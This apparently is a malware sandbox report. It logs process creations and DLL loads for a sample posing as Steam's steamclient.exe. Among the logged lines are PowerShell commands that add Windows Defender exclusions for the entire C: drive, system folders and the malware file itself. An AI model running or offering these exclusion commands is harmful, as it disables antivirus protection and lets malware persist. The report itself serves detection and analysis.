                    Source: C:\Program Files (x86)\Steam\steamclient.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Program Files (x86)\Steam\steamclient.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: unknownProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\qNdO4D18CF.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe C:\Users\user\Desktop\qNdO4D18CF.exe
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.cmdline"Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA90.tmp" "c:\Windows\System32\CSCA9DA535D810450AA35B2C9F27DA16D.TMP"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Steam\steamclient.exe "C:\Program Files (x86)\Steam\steamclient.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\qNdO4D18CF.exe C:\Users\user\Desktop\qNdO4D18CF.exe
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\qNdO4D18CF.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
